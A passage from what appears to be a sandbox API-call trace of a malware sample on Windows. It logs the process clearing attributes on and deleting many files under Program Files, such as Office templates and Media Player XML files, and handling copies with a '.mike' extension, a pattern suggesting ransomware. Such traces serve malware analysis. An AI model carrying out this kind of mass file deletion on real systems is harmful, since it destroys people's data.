Office\\Templates\\1033\\Access\\Part\\Users.accdt", dwFileAttributes=0x80) returned 1 [0100.607] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\Users.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\users.accdt")) returned 1 [0100.610] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.610] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.610] CoTaskMemFree (pv=0x506980) [0100.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.610] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.633] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\107.accdt", dwFileAttributes=0x80) returned 1 [0100.633] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\107.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\wss\\107.accdt")) returned 1 [0100.641] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.669] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\1100.accdt", dwFileAttributes=0x80) returned 1 [0100.669] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\1100.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\wss\\1100.accdt")) returned 1 [0100.673] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.673] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.673] CoTaskMemFree (pv=0x506980) [0100.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.677] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0100.689] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\EquityFax.Dotx", dwFileAttributes=0x80) returned 1 [0100.690] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\EquityFax.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\fax\\equityfax.dotx")) returned 1 [0100.692] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0100.712] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\MedianFax.Dotx", dwFileAttributes=0x80) returned 1 [0100.712] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\MedianFax.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\fax\\medianfax.dotx")) returned 1 [0100.715] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0100.730] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\OrielFax.Dotx", dwFileAttributes=0x80) returned 1 [0100.731] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\OrielFax.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\fax\\orielfax.dotx")) returned 1 [0100.734] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0100.744] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\OriginFax.Dotx", dwFileAttributes=0x80) returned 1 [0100.744] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\OriginFax.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\fax\\originfax.dotx")) returned 1 [0100.747] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0100.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\UrbanFax.Dotx", dwFileAttributes=0x80) returned 1 [0100.757] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\UrbanFax.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\fax\\urbanfax.dotx")) returned 1 [0100.760] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.760] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.760] CoTaskMemFree (pv=0x506980) [0100.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.761] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.761] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.761] CoTaskMemFree (pv=0x506980) [0100.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.762] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.762] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.762] CoTaskMemFree (pv=0x506980) [0100.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.763] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.763] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.763] CoTaskMemFree (pv=0x506980) [0100.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.763] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.763] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.763] CoTaskMemFree (pv=0x506980) [0100.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.764] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.764] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.764] CoTaskMemFree (pv=0x506980) [0100.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.765] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.765] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.765] CoTaskMemFree (pv=0x506980) [0100.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.768] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.768] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.768] CoTaskMemFree (pv=0x506980) [0100.769] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.769] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.769] CoTaskMemFree (pv=0x506980) [0100.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.770] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.770] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.770] CoTaskMemFree (pv=0x506980) [0100.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.770] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.770] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.771] CoTaskMemFree (pv=0x506980) [0100.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.771] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.771] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.772] CoTaskMemFree (pv=0x506980) [0100.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.772] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.772] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.773] CoTaskMemFree (pv=0x506980) [0100.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.773] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0100.783] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf", dwFileAttributes=0x80) returned 1 [0100.784] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\synchronizationeula.rtf")) returned 1 [0100.786] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.786] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.786] CoTaskMemFree (pv=0x506980) [0100.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.787] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.787] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.787] CoTaskMemFree (pv=0x506980) [0100.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.791] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.791] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.791] CoTaskMemFree (pv=0x506980) [0100.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.793] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.793] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.793] CoTaskMemFree (pv=0x506980) [0100.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.794] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.794] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.794] CoTaskMemFree (pv=0x506980) [0100.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.794] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.794] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.794] CoTaskMemFree (pv=0x506980) [0100.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.795] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.795] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.795] CoTaskMemFree (pv=0x506980) [0100.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.799] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.799] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.800] CoTaskMemFree (pv=0x506980) [0100.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.800] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.800] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.800] CoTaskMemFree (pv=0x506980) [0100.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.801] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.801] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.801] CoTaskMemFree (pv=0x506980) [0100.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.802] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.802] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.802] CoTaskMemFree (pv=0x506980) [0100.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.802] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.802] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.802] CoTaskMemFree (pv=0x506980) [0100.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.803] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.803] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.803] CoTaskMemFree (pv=0x506980) [0100.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.803] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.803] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.803] CoTaskMemFree (pv=0x506980) [0100.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.804] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.804] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.804] CoTaskMemFree (pv=0x506980) [0100.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.804] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.804] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.804] CoTaskMemFree (pv=0x506980) [0100.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.805] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.805] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.805] CoTaskMemFree (pv=0x506980) [0100.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.805] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.805] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.806] CoTaskMemFree (pv=0x506980) [0100.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.809] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.809] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.809] CoTaskMemFree (pv=0x506980) [0100.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.815] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.815] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.815] CoTaskMemFree (pv=0x506980) [0100.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.819] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.819] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.819] CoTaskMemFree (pv=0x506980) [0100.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.822] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.823] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.823] CoTaskMemFree (pv=0x506980) [0100.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.824] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.824] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.824] CoTaskMemFree (pv=0x506980) [0100.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.827] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.827] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.827] CoTaskMemFree (pv=0x506980) [0100.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.832] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.832] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.832] CoTaskMemFree (pv=0x506980) [0100.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.833] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0100.833] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0100.833] CoTaskMemFree (pv=0x506980) [0100.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0100.844] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml", nBufferLength=0x105, lpBuffer=0x2aeba8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml", lpFilePart=0x0) returned 0x44 [0100.844] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\avtransport.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0100.847] GetFileType (hFile=0x288) returned 0x1 [0100.847] GetFileType (hFile=0x288) returned 0x1 [0100.847] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0100.853] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml", dwFileAttributes=0x80) returned 0 [0100.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b8) returned 1 [0100.855] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\avtransport.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af134 | out: lpFileInformation=0x2af134*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5671140, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x5671140, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x5671140, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x4fb0)) returned 1 [0100.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0b4) returned 1 [0100.855] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml", nBufferLength=0x105, lpBuffer=0x2aec34, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml", lpFilePart=0x0) returned 0x44 [0100.855] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml.mike" (normalized: "c:\\program files\\windows media player\\media renderer\\avtransport.xml.mike")) returned 1 [0100.857] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpFilePart=0x0) returned 0x4e [0100.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0100.857] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0100.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adfa0) returned 1 [0100.859] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", nBufferLength=0x105, lpBuffer=0x2aeba8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpFilePart=0x0) returned 0x4e [0100.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af09c) returned 1 [0100.859] CreateFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media 